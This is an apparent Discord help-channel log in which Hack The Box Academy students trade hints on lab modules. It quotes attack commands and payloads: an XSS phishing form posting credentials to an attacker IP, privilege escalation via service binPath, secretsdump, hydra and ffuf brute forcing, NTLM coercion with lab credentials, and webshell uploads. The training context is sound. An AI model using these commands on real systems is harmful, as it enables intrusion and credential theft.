#modules
mb, didn't know that you can just copy-paste an exe file -_-
This module was a pain!
Good luck!
Recently the Internet Archive got hacked and I was doing Information Gathering - Web Edition. There is a section on web archives talking about the Wayback Machine to find past snapshots of a website. There is no data on the Internet Archive for 8 Aug 2018. HTB team, please fix this issue.
Hi folks
I finished the "Credentialed LDAP Enumeration" module.
But I will admit, I solved some of the userAccountControl questions via AI
Is there any good site or blog where I can learn more about custom ldap queries?
Like this stuff: --custom "(&(userAccountControl:1.2.840.113556.1.4.803:=512)(userAccountControl:1.2.840.113556.1.4.803:=128))"
It's not an issue
Htb wasn't always a .com website
The ad enum and attacks module has a neat little graph about perms and such
I am a new member
Same to you bhai
Welcome. Read my message right above
@storm elk bro, the rule is quite long
English please. this isn’t general chat
Rule is too long
Can anyone explain how to become an ethical hacker?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@signal sapphire, can anyone also help me?
Hello, doing File Inclusion > Skills Assessment. I have found the hidden admin page: ||http://94.237.62.166:40163/?page=ilf_admin/index|| however the page doesn't display correctly. There are squares all around and all the text is in just one long string, nothing gets displayed. Whenever I click on one of the logs, it just brings me back to the main page. I thought it might have been my network but it's the same on the PwnBox too. And I tried restarting the target but it doesn't change anything. Can anyone help me understand what's going on?
Thanks for reply. But does it talk about the values and stuff? this is more custom queries.
Also, should I spin my wheels on that? I know we can get some useful stuff via BloodHound. Not sure how valuable it would be to learn more about custom LDAP queries, especially when we can use AI.
Someone can correct me if I am wrong.
Hey, @storm elk
have you done the advanced deserialization module?
Yes it talks about what values correlate to which UAC functions
Most people think whenever an IP Address changes, it is a proxy, and in most cases, it's probably best not to correct them as it is a common and harmless misconception. Correcting them could lead to a more extended conversation that trails into tabs vs. spaces, emacs vs. vim, or finding out they are a nano user.
I love finding these things in the modules
I found that with the image in the section, but in the real world is there a way to find if a website or domain existed on another TLD previously?
Doing some googling and light OSINT; since HTB is an EU based company it's not a long stretch
I literally told you; HTB is an EU based company
Think about what TLD would correlate to that
Is anyone solving CDSA now?
Before that I knew that it was EU, and thanks for replying to me. I am asking whether there is a way to find if a website existed on another TLD like this. I don't understand how to google to find the solution to this.
Someone? 😊
Yes I have.
Can I DM you for a few pointers on the XML section?
Can’t figure if I’m setting the type wrong or something
Sure. I’m about to go out for a bit though
No hurry, respond whenever you feel like it
I’m just trying to understand that last part
yes
Can someone please help me with a nudge to find the open button?
Module: Attacking Common Applications.
Section: Exploiting Web Vulnerabilities in Thick-Client Applications.
Problem: I can't find the open button in the java app..
Hello, I have bought a gold subscription and waited more than 10m and still I cannot access any modules
did you purchase gold annual? which unlocks up to tier 3, or did you purchase gold monthly which only gives you 500 cubes?
really?! I just bought monthly
can anyone help me with a nudge on kerberos attacks skills assessment last question
i have creds of an** but not able to rdp on ||SERVER01||
Students can access all tier 2 modules and gold cannot access anything, what shit logic!!!
not really, students often have discounts on learning resources so it kinda makes sense to me
the silver/gold/plat give 200/500/1000 cubes a month
student is up to tier 2, similar to how the silver/gold annual work
I'm a student btw, but it's not clear when you give students full tier 2 access and gold has only 500 cubes.
if you are a student, confirm your email and get the student monthly for $8/m and have up to tier 2 unlocked
I don't want tier 2, I want tier 3. Anyway, if I send an email and haven't used the cubes, can I get my money back?
you'll want to reach out to support
Need to speak to a person? Learn how to reach our support via HTB Labs.
the package you're looking for instead would be the gold annual
which flag did you use to get the full TCP three-way handshake?
$1300, I'd rather go for OSEP, at least that gets me a job
anyway thanks bro.
np
Hello, good evening, can someone help me with NoSql Assessment II? I'm stuck hehe, I got a hash but I can't break it, can anyone tell me if this is the way?
||I found a nosql time based on login and I can't list another user besides bmdyy, so I managed to get his password hash and I got stuck||
Look for another possibility besides cracking the password.
Fixed it, you need to restart the target until it works...
@acoustic owl can i dm you?
I will be very grateful if you can give me a tip on how to solve it
Can we have an android related module please?
Something to cover the history and methods of exploiting mobile devices
For example, older Androids had a vulnerability that allowed someone to gain access to their config file and give themselves unlimited wrong password attempts and brute force their way in. That is patched in newer Androids, but knowing the history wouldn't hurt.
Also include android based malwares and AV evasion methods on android and so on.
Would be cool to have it
Friends, could you please tell me, in the MSSQL, Exchange, and SCCM Attacks: Skills Assessment, after completing the second-to-last task, I got the final flag without any effort. Was it meant to be this way?
Yes.
But you can train with pushing a script
Hello, may I get some help for the Credential Hunting in Linux part of the password attacks module ?
I did try to perform a brute force attack over FTP using the provided list but nothing worked... Is this the correct way to gain SSH access?
Even the "Help" didn't really help me...
did you try the mutated list?
Yes I did use the custom.rule on the password.list
rules are different than the password list
I mean I did use the custom.rule file and applied them to the password list
so you didn't use the mutated password list then?
which mutated password list ? I only got 2 list (user & password) and a .rule file
the password list I used come from this command : hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
oh yeah sorry was thinking of something else maybe.. hard to say from my notes. yeah that looks right.
right so that's the mutated list
I did try on ftp as it is quicker than ssh
I used both cme and msfconsole (ftp_login module)
i used hydra
generally you don't want to attack ssh unless specified, it's tough to brute ssh
yes it's why I did cme & msfconsole on ftp...
But also the hint gives the password & username but even with that I can't ssh into the machine... This is weird. I don't know if i'm dumb or what at this point xD
I will try to reset the machine before performing the brute force with hydra. Thank you for your help
guys, a quick question
I get this error when I run crackmapexec
"bash: cme: command not found"
how can i fix it?
Cme was replaced by nxc
On pwnbox there was an official changeover
cme isn't the command, it's crackmapexec the whole thing
cme was archived ~1yr ago anyway, and is no longer maintained
Even longer probably
yes I know, when I run crackmapexec , the response is bash: cme: command not found
yes i got it
you should be able to substitute your cme commands with netexec or nxc
Sounds like CME isn't installed, you can just use netexec as calc and marcie mentioned
if i add myself to the Administrators
group does that mean i have full access on the DC?
or is that just the administrator on that local computer?
depends on which administrator's group. any group can have the powers of a domain admin. if we're going with default settings, it sounds like only a local admin.
mind if you're able to VC? I just want to understand things better
sure let me explain further: The server operator group is able to log in locally to servers, including Domain Controllers.
In the Windows Privilege Escalation module they did C:\htb> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add", which was to add the current user to the Administrators group, and from there they then did
secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator
So my questions are, is this administrator group of the local DC?
If it is, would that give you access to the domain controller? If not, would this command be better: cmd /c net group "Domain Admins" user /add /domain
Like, I'm confused how they were able to dump the hashes when wouldn't this be the local Administrators group of the server?
sorry if this is a dumb question
yeah net localgroup is a command for local groups, not domain groups
ohh so they added it to the local group of the DC?
right, that would only give you local admin to the DC not domain admin
but if you have some kind of exploit that can run commands to privesc, you can modify it to do other things
also could the same hash dumping be achieved if added to the domain admin group like using cmd /c net group "Domain Admins" user /add /domain
probably but you'd have to test
oh shit, last question on this, ik this is stupid, but so if I'm becoming a local admin on the DC and can then dump the hashes, this means as a Server Operator, which can log in locally to servers including Domain Controllers, I **must** log in to the DC and use this exploit specifically on the DC to join specifically its local Administrators group so I can dump hashes.
English only server sorry
sorry not sure what you're asking
nvm all good i get it, just wanted reassurance lol
Hi guys, I wanted to know the difference when fuzzing a URL vs, let's say... I just don't understand what fuzzing with a wordlist is, for example FUZZ vs :FUZZ
i hope it makes sense
sounds like you're talking about ffuf
that's just a wildcard to tell ffuf to fuzz with a wordlist and where to fuzz
i see thanks man
wordlist.txt:FUZZ, this tells ffuf to use "wordlist.txt" to iterate through the list where you put the "FUZZ" wildcard, so ffuf -w wordlist:FUZZ -u http://fuzz.htb would fuzz the "fuzz" part of http://fuzz.htb
like it recurses?
i think you can change the wildcard and have multiple of them, so you could do ffuf -w wordlist:BUTTS -u http://BUTTS.htb and get the same result
Unless there is cached creds in a domain joined host which is not a domain controller, you'd be only dumping local hashes.
Also, if I'm not mistaken, whenever a host becomes a dc, it should not have local accounts.
So, if you grab a hold of an "Administrator" account from a DC, it should be the "Administrator" account for the Domain
it just tells ffuf to use the chosen wordlist in the specific location
The Cicada (easy) box was a good example of this.
I'll research more about it, thanks
you can also do multiple wildcards like this ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://localhost:3000/login -fc 200
You gotta restart it until you can, but you don't need it to go to next step.
You can ignore this issue.
👍
Hello fellow hackers
Right in the feels with that one.
hi I'm doing Linux credential hunting. Hydra won't give me a password for will or kira
and I have the usernames list but brute forcing both that and the password list would take forever
and I could do that but I don't know if that's a good approach
this is for the Linux Credential Hunting section of Password Attacks module
am I doing the right thing by brute forcing the usernames and passwords both?
I have a usernames list and a passwords list from the resources section
hydra never finds anything and I'm unsure if trying every username/password combo using the username list and the password list separately is a smart idea or if I'm going in the wrong direction
if I remember correctly, try with Kira or kira
I did, it didn't crack successfully with either
and same thing with Will and will
and brute forcing it with both username list and password list is taking a million years
you need to adapt the list with the hint provided
ok
tell me if you still need help
I'm gonna try again tomorrow first
I'm at a party, so gonna sleep on it and try again tomorrow
now that I know hydra is the right way to go
👍
Yes, of course, but I'm not online regularly this week. So an answer may be delayed
Have a look at what other functions the website offers.
AD Enumeration and Attacks, Section Bleeding Edge vulnerabilities. They mentioned this
Let's walk through the attack. First off, we need to start ntlmrelayx.py in one window on our attack host, specifying the Web Enrollment URL for the CA host and using either the KerberosAuthentication or DomainController AD CS template. If we didn't know the location of the CA, we could use a tool such as certi to attempt to locate it.
Does anyone know how to use this tool to locate this? No idea how to actually find the location of the CA
https://academy.hackthebox.com/module/143/section/1484
certi.py find -d <domain> -u <username> -p <password>
like this ? I cloned it from the github repo they mention there
kali@kali:~/Downloads/Support/certi [01-11-2024 10:46]$ ./certi.py find -d support.htb -u guest -p ''
usage: certi.py [-h] {list,req} ...
certi.py: error: argument command: invalid choice: 'find' (choose from 'list', 'req')
kali@kali:~/Downloads/Support/certi [01-11-2024 10:47]$ ./certi.py -h
usage: certi.py [-h] {list,req} ...
positional arguments:
{list,req}
options:
-h, --help show this help message and exit
kali@kali:~/Downloads/Support/certi [01-11-2024 10:47]$
oh it is list not find
yeah, tried a few more things and it shows this, I guess you cannot enumerate it without credentials, even though petitpotam works without any creds
kali@kali:~/Downloads/Support/certi [01-11-2024 10:57]$ ./certi.py list --dc-ip 10.129.230.181 support.htb/guest
Password:
Traceback (most recent call last):
File "/home/kali/Downloads/Support/certi/./certi.py", line 5, in <module>
certilib.main()
File "/home/kali/Downloads/Support/certi/certilib/main.py", line 245, in main
return main_list(args)
^^^^^^^^^^^^^^^
File "/home/kali/Downloads/Support/certi/certilib/main.py", line 450, in main_list
templates = list(fetch_templates(
^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Downloads/Support/certi/certilib/main.py", line 651, in fetch_templates
resp = search_ldap(
^^^^^^^^^^^^
File "/home/kali/Downloads/Support/certi/certilib/ldap.py", line 69, in search_ldap
return ldap_conn.search(
^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 402, in search
raise LDAPSearchError(
impacket.ldap.ldap.LDAPSearchError: Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
you can try passing "empty" creds for anonymous bind, might not work all the time though
hmmm, how would you do that though? For me the tool seems to want to take in a username no matter what
-u "" -p "" does not work?
like this ?
kali@kali:~/Downloads/Support/certi [01-11-2024 10:57]$ ./certi.py list -d support.htb -u '' -p ''
usage: certi.py list [-h] [--dc-ip IP] [-k] [-n] [--class [{template,ca,service,ntauth} ...]] [--aes hex key] [--enabled] [--vuln] [--temp-name TEMP_NAME [TEMP_NAME ...]]
[--temp-filter TEMP_FILTER] [--hashes LMHASH:NTHASH] [--ssl]
target
certi.py list: error: argument target: Domain of user 'support.htb' should be be specified
I'm a little lost, looking at GitHub "list" doesn't even seem to be a valid command?
it is, according to the help menu at least
kali@kali:~/Downloads/Support/certi [01-11-2024 11:02]$ ./certi.py list -h
usage: certi.py list [-h] [--dc-ip IP] [-k] [-n] [--class [{template,ca,service,ntauth} ...]] [--aes hex key] [--enabled] [--vuln] [--temp-name TEMP_NAME [TEMP_NAME ...]]
[--temp-filter TEMP_FILTER] [--hashes LMHASH:NTHASH] [--ssl]
target
positional arguments:
target domain/username[:password]
options:
-h, --help show this help message and exit
--dc-ip IP IP address of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-n, --no-pass don't ask for password (useful for -k)
--class [{template,ca,service,ntauth} ...]
Classes to retrieve
--aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
--enabled Show only templates that are used by some enroll service
--vuln Show only templates with vulnerable configurations
--temp-name TEMP_NAME [TEMP_NAME ...]
Request only template with the given name
--temp-filter TEMP_FILTER
LDAP filter for templates
--hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
--ssl Use LDAPS instead of LDAP
oh, I'm looking at the Windows one, whoops
yeah, it's really confusing hence why they should have included it in the module....
maybe try certipy-ad
you can try netexec/crackmapexec too crackmapexec ldap 172.16.117.0/24 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -M adcs
I assume you'll need creds anyway to abuse it in the end
certipy-ad find -u '' -p '' -target sequel.htb -text -stdout -vulnerable
well that's the thing, PetitPotam is supposed to not need credentials
from the official github https://github.com/topotam/PetitPotam
kali@kali:~/Downloads/Support/certi [01-11-2024 11:08]$ certipy-ad find -u '' -p '' -target support.htb -text -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Username is not specified
[-] Got error: socket ssl wrapping error: [Errno 104] Connection reset by peer
[-] Use -debug to print a stacktrace
kali@kali:~/Downloads/Support/certi [01-11-2024 11:05]$ nxc smb DC -u guest -p '' -M adcs
[-] Module ADCS is not supported for protocol smb
kali@kali:~/Downloads/Support/certi [01-11-2024 11:07]$ nxc ldap DC -u guest -p '' -M adcs
SMB 10.129.230.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
LDAP 10.129.230.181 389 DC [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.129.230.181 389 DC [+] support.htb\guest:
ADCS 10.129.230.181 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.230.181 389 DC [-] Obtained unexpected exception: Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
smb > ldap
is the lab just messed up lol
it's not for a lab, in the module, it's against a random machine on the site. Just trying to apply the module knowledge. They say you can identify the enrollment part with this certi tool, but it does not seem to be the case. They could have covered it imo, considering ADCS is not really an easy thing to mess with
kali@kali:~/Downloads/Support/certi [01-11-2024 11:09]$ nxc smb DC -u guest -p '' -M adcs
[-] Module ADCS is not supported for protocol smb
sadly does not seem to support it
Support is a box used by an IT staff, and one authored by me! I’ll start by getting a custom .NET tool from an open SMB share. With some light .NET reversing, through dynamic analysis, I can get the credentials for an account from the binary. With those, I’ll enumerate LDAP and find a password in an info field on a shared account. That account h...
yep I know, it's not about the box, it's about the tool they tell you to use
Okay, thanks
I'm on the web attacks module, http verb tampering section (basic auth bypass). This command curl -i -X OPTIONS http://IP:PORT should show me the available methods the web app accepts, but is not showing me anything
was the crackmapexec module skills assessment updated?
I was able to get the flag by sending random methods, but that command right there should return the Allow header showing me the allowed methods, right?
Just like the module explains
AD enum & attacks - kerberoasting from windows
I know the module said
Now that we have seen the older, more manual way to perform Kerberoasting from a Windows machine and offline processing, let's look at some quicker ways. Most assessments are time-boxed, and we often need to work as quickly and efficiently as possible, so the above method will likely not be our go-to every time. That being said, it can be useful for us to have other tricks up our sleeves and methodologies in case our automated tools fail or are blocked.
but if Rubeus is blocked, won't mimikatz also be blocked?
like, idk but mimikatz feels more famous than Rubeus
I need help with Whitebox Attacks Type Juggling Authentication Bypass
If anybody has completed that and sees this message, please let me know.
Just ask ur question
The type juggling, can't exploit it on the login endpoint
if (pw_hash($data['password']) == $user['password'])
According to the module if you send a password value 0 it should match the admin user's magic hash which starts with 0e....
There’s multiple payloads given in that section iirc
but this doesn't work for me!
I tried a value whose SHA-256 hash starts with 0e (34250003024812) but still no luck
The hint I’ll give is brackets
The endpoint accepts JSON, are you sure that I can still use the [] here?
@analog dock for type juggling?
Yes
That section talks about some vulns in how a specific PHP version handles stuff.
Try googling it
Getting Started module: Last Check
I have user privilege on the machine, I completed the LinEnum scan in the reverse shell and it shows me this:
When I'm trying to run the command It says: permission denied
Check the directory
there are lots of files in the directory, hundreds of them
Check both of your screenshots.
What one says and what you are trying to accomplish in a directory that you don't have permissions
Also.... The sudo is for running binaries in a "super user" context, not writing inside the directory.
So, try to write the WebShell in a directory that you are allowed to write, then run whatever binary as root
hello
@dapper moth I'm lost, I don't really understand what to do. If you can please hop in the voice to me.
You have enumerated that you are a SUDOER for some specific command
The GTFOBins I sent you can give the specific commands as to escalate privileges depending on the command you are allowed to pass via 'sudo'
Just have to adapt to the output you got
Good morning guys, could someone give me a light on NOSQLI skill assessment II?
I've managed to do it, thanks
Hi guys, I'm doing the penetration tester path and in the metasploit module of "sessions" I have to use metasploit to exploit elfinder. One of the questions is as what user you are logged in now. I tried "meterpreter> shell" but for some reason it's broken. And I know I can just use "getuid" command instead but the walkthrough is using meterpreter> shell, and I believe I had problems with this command yesterday as well, but didn't think much of it.
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
Does anyone know what I should check?
Nevermind I think I got it
Module: Cross-Site-Scripting (XSS)
Section; Phishing
||'> <script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.196:8080/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script> <!--|| I'm confused why this payload doesn't work, tried to send it like this, then URL encoded. Am I missing something or what? It just keeps saying invalid URL
Good morning! I am on the Identifying SSRF module and having a hard time finding the flag. I found some open ports with ffuf but I can't browse them. Any hints please?
I did this module some time ago, but aren't you supposed to put this into a form field on the webpage and not the URL?
yeah
So in PwnBox "meterpreter> shell" command works, but on my own kali box it just doesn't work smh, I also updated, upgraded, autoremoved, autocleaned everything, even reinstalled metasploit, but so far no luck. Anyone know what's going on here?
what happens when you try it ?
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
looks like it could be a recent, still open, issue: https://github.com/rapid7/metasploit-framework/issues/19569
I'm about to go through the same section same module, and just updated my parrot VM. Might have the same problem, will let you know
Ohhh ok yeah that might explain it, so I'm guessing that metasploit on my kali machine is a more recent version than the one on the parrot PwnBox?
Good luck and thanks for the info 🙂
possible yeah, I'm not sure how often the pwnbox gets updated
Yep just checked, metasploit on my kali is more recent. Guess we'll just have to wait for that update then and use PwnBox for this module
does it match the version on the bug report ? Framework: 6.4.32-dev-
or higher, I suppose
yep thats my kali version
pwnbox is on 6.3.44
I'm on 6.4.44-dev-, so I guess I'll be affected too. Let's see
let me know
If it does work I'll have to not install it through apt lol
Looking to get any directions on this please
Hello, I can't figure out how to do the Login Brute Forcing skills assessment 2. I have used username-anarchy to create a list of usernames for Thomas Smith and then used the passwords.txt file for my passwords. However, when I run this Hydra command, it can't find any combinations: hydra -l thomas -P passwords.txt -f ftp://83.136.253.249 -v. And when I try to run medusa it can't connect to port 21. If anyone has any ideas on what I might be doing wrong, please let me know
it worked for me, I'm afraid 😦 I guess there's more to it than just the version
Why is there more to it than just the version you say? It worked right? Anyways thanks for letting me know, I think I might also install Parrot OS, from what I've seen so far it may work a lil better than Kali at times
Anyone got any ideas on the Wi-Fi Penetration Testing Basics module? Can't seem to understand what "locate the flag at <ip_address>" wants me to do: Connect to the WPA Wi-Fi network named "CyberNet-Secure" with the PSK "Password123!!!!!!". Once connected, locate the flag at the IP address 192.168.1.1.
I mean that I should be affected if it were only a matter of versions; the report was on version 6.4.32-dev-, the issue is still open and I'm on 6.4.44-dev-
Ahh gotcha, yeah maybe some weird dependencies
oh wait, the issue is closed actually! It was so recent that I assumed it was still open
so I guess my version is patched already (hard to confirm quickly with their versioning convention, but I guess that's it)
Visit the IP in the browser
Figured
Now just stuck at the SA
Tried that, doesn't work
JavaScript Deobfuscation skills assessment: As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable.
i found the code and put it together
and the flag, but it doesn't accept it for some reason
nvm got it
Hello. Sliver Module, first lab. Cannot get upload attack to work. After uploading stager, I go to the link of upload and it shows error:
Server Error in '/' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>
🆘
is there anyone near the information gathering module ?
its in information gathering/digging DNS
I've tried every single command possible but it's not working.. so it's either a glitch or there's something stupid happening
Are you on the skills assessment?
Anyone able to help me out - doing the sliver module, I've got an interactive SYSTEM shell, I can run "hashdump" no problem, but when I try and use the "execute" function for arbitrary things (such as "whoami" or "schtasks /query" with the --output flag enabled) I get an exit code of "3221225794" - when I run it as the administrator account, works fine..
regarding my question, i just figured out they updated the module so nevermind
Hi, who can give me a hint on the Advanced SQL Injection skills assessment (RCE)? It seems that CREATE FUNCTION doesn't work
section
just after 'Privilege Escalation' - it's not part of any questions, I'm just wanting to play around with sliver more as I'm new to it..
Example screenshot:
Hello,
I'm currently stuck at the question : Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
Module : Password attacks
Chapter : Pass The Hash
I did try to use smbclient & smbclient.py and I manage to connect to the shared folder however there is no DC01 folder.
I tried to perform a scan to enumerate shares on a /24 to see if maybe another host was up using cme but didn't get any result.
Can I have a hint please ?
\\DC01\ is another machine
oh, I understand now, I have to do it from the MS01 machine. That's why I don't see any other IP from my Kali, I guess? Thank you!
For ntlm relay module anyone know why I would get "NO_AUTH_RECEIVED" from coercer for every request when I double checked creds and responder is running?
(am getting same response when scanning)
Guys
Ok having a problem with metasploit
So basically I'm on Ubuntu, I used the command sudo snap install metasploit framework, then I did msfconsole and I got a text saying that it's more than 2 weeks old and I should do msfupdate
Then I do msfupdate and it says it's not supported and I should do sudo snap refresh metasploit-framework
And after I do that it tells me metasploit framework has no available updates
And then I do msfconsole and it tells me again metasploit framework needs to be updated
What do I do? I'm trying to use eternal blue exploit and it keeps failing
how does it fail ?
the snap package is probably just not updated
but that is also unrelated to eternal blue exploit failing
With the other sessions does it output ok!?
do you have to use eternalblue ? I've always had (far) more luck with the psexec exploit for the same issue
Idk the module used eternal blue
Why is it not working
which module/section?
Shells and payloads infiltrating windows
"Since I have had more luck with the psexec version of this exploit, we will try that one first. Let's choose it and continue the setup."
Shouldn't you be coercing 172.16.117.50?
same goes for .50
Depends on the type of auth the Host accepts
questions ask you to run against .60
Have you tried:
python3 Coercer.py -t 172.16.117.60 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' -wh SUPPORTPC2 -wp 80 -v?
Might be the problem:
Coercer has the --auth-type option that allows us to specify either http or smb, depending on the type of NTLM authentication we want to coerce; however, unfortunately, all 2.* releases of Coercer cannot successfully coerce HTTP NTLM authentication on hosts with WebDAV enabled (the tool only can coerce SMB NTLM authentication). Regardless of offering fewer methods compared to 2.* releases, release 1.6 successfully coerces HTTP NTLM authentication.
On the AD module, how come I pinged hosts and found 245 last month, and this month I can only find 224?
Mh ur right
How to ping unpingable hosts which are still up?
is your LHOST the right one (VPN)?
no I am trying to answer this question 'Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag' in SSRF module but can't browse that internal web with the ports I found.
Ye I did ifconfig
Brother Eternal Blue fails normally even on vulnerable target. Not related to updating metasploit
paste your options to confirm. You can DM if you'd like
When I did the eternal blue box, I used 3 terminal tabs to spam the exploit at the target, maybe 1 works
If it doesn't -- reset the box and try again
yeah this just gives these pipe disconnected errors
Ye but I also tried psexec
Ok one moment
I'll give a check later and tell you if I couldn't do it
Finished this thing a while back
beast, yeah I've moved on, u can assume the module answers thankfully but I think this section might just be broken for me at least
@urban elk worked
cool! I'm glad, what changed?
Htb vpn
cuz DC01 is an internal IP iirc
Indeed
It's internal to the MS01 network (172.16.x.x)
who can help with Advanced XSS and CSRF Exploitation Skills Assessment?
what's up
I listed all the customers and found a customer
but I don't know what to do next.
I texted you what I found in dm
Hello Everyone! I hope you all had a wonderful week! I have a question about connection issues. I was running through the "Getting Started" (Public Exploits) module, but I keep running into errors while enumerating the target IP. The particular one I am seeing now is an EOF error with gobuster. I also cannot get feroxbuster to connect either. I identified ||wordpress|| on the target so I tried ||wpscan||, again it says the site is down... It clearly is not. Just wondering if there is a setup issue I am running into.
Yes, I am connected to the VPN
I'd really appreciate it if you could help.
You don't need to browse to anything. Are you still working on this one?
Yo
How do I install metasploit in Ubuntu without snap
I am trying to add an exploit to metasploit but it says snap is read only
I tried removing it and installing again with the --classic flag but it still says it's read only
?
I have it installed
I cant write in the exploits directory bc it says it's read only
But I did install metasploit multiple times
use sudo?
It doesn't work?
Could someone be kind enough to help me with Login Brute Force, Login Forms? For the question it asks me to successfully brute force and login into the target, which I did, but I cannot find the flag in the html document
hello, could you help me, I'm trying to configure Swagger with the IP that the HTB API module gives me and I can't figure out how to do it.
you should try explaining what you are actually wanting then, you first said install without snap, then you're saying you already have it installed, but now you want to add plugins. You should be able to sudo touch /dir, if not do it as root.
if you're logged in, it should be right below the logout button
I see, thanks!
yep, in the screenshot it shows it working as defaultapppool, then switching to system beacon - it doesn't work..
I have googled that error code a bit, but unsure if someone else has faced a similar issue specifically within sliver
Yes I still can't figure it out
You can DM me.
who can help with Advanced XSS and CSRF Exploitation Skills Assessment?
For the Introduction to Network Traffic Analysis module - Familiarity with Wireshark section. Where are we supposed to run Wireshark in the Pwnbox? I can start Wireshark but I cannot see the eth0 interface listed in Wireshark.
OR
Are we supposed to run Wireshark on our local desktop? Thanks for your help
Doesn't matter where you run it as long as you can open the pcap file, if I recall correctly
OK cool thanks.
ah u had to recreate the plaintext$ computer object nvm
Did you get it!?
Is the site undergoing maintenance? It keeps disconnecting me from the target's IP.
Yo
So I'm on shells and payloads, laudanum
I edited my /etc/hosts in Kali, downloaded shell.aspx and I put my IP address in it, then I went to status.inlanefreight.local and I uploaded the file. It's not telling me the directory of the file and when I go to status.inlanefreight.local//files/file.aspx it gives me error 404
I tried a new IP for the box multiple times and I changed my vpn too
Idk what's going on
it's weird that it's not telling you the directory, but did you use backslashes as instructed?
In file upload? Or in url? In url I tried everything
in url
Ye ye I tried everything
Hi guys, im in the module information gathering - web edition.
Third question about getting the API key in the hidden directory, I already did vhost, fuzz with multiple dictionaries and tools but nothing
I also tried to upload antak.aspx in the next room but it still doesn't tell me the directory. It doesn't even tell me if it's uploaded but I don't think it is
that's odd. So you pick the file, you hit Upload file, and after the page refreshes you don't have the same feedback at the bottom of the page, as shown on the screenshot?
Exactly
Hit upload and just see on the bottom left the url of the upload page
For like half a second
And then I go to the url where the file should be and it shows me the search engine results of the page if I use the //file directory
Otherwise it gives me error 404 if I use anything else
ok the url disappearing is weird, but are you sure you've tried "\files\file.aspx"? As opposed to //
ugh, the double backslash is escaping... so it's double backslash before files
\\files\file.aspx
I write \files\file.aspx and the browser writes it back to /files/file.aspx
that's normal, but it should load the webshell
No it's giving me error 404
are you sure your IP is correct on the allow list of the webshell? Again, the VPN (tun0) IP
Ye
Like I got shells from different modules with that ip
Also the antak.aspx doesn't even ask me for the login credentials : (
I'm afraid I don't know what else could be wrong, sorry 😦
anytime, I hope you figure it out or someone else has a clue
bruteforce vhost for subdomains with subdomains-top1million-110000.txt
then brute force that subdomain for directories, then brute force
(hidden subdomain).inlanefreight.htb:40707/
for another subdomain and i think you can figure out from there.
I promise I went through the entire list and other dictionaries, maybe I have to reduce the threads
Can you send me the link for the specific question, I did it before and had the same issue but can't remember. So let me see that question again and I'll help.
how many threads are you doing
Default, I think it is 10
let me dm so we don't clog up the chat but I think I can fix your issue
But that hint is enough, maybe I'm doing something wrong
I will dm you if needed, i want to try first, ty.
ok np
Module: API Attacks
Section: Broken Object Level Authorization
stuck on the second BOLA exploit, hint says to target the ||/api/v1/suppliers/quarterly-reports/{ID}|| endpoint, I feel like I'm missing something because I get 403 forbidden since my credentials don't have the required role
You can DM if you are still stuck.
appreciate the help! it's always something stupid
Can someone help me in AD enum & atk - skill assessment 1 ?
I wanna upload chisel.exe to Windows web shell, however I can't find any chisel.exe package online, instead there's chisel_1.9.1_windows_amd64.gz on Github.
Although I've checked that "chisel_1.9.1_windows_amd64" is an executable, I can't execute it with
chisel_1.9.1_windows_amd64 or & "C:\chisel_1.9.1_windows_amd64" (is not recognized as the name of cmdlet, ... or program) on PowerShell
How could I "execute" it, or change it to an actual executable (I've tried appending the .exe extension but it doesn't work)
Thanks
Rename the file to have the exe extension after
It should execute in windows
Did you extract the executable from the compressed format?
yes, I've run gunzip -d *.gz
oh it works, but after server-client connected, it seems like I can't access 172.16.x.x
should I restart?
(/etc/proxychains.conf
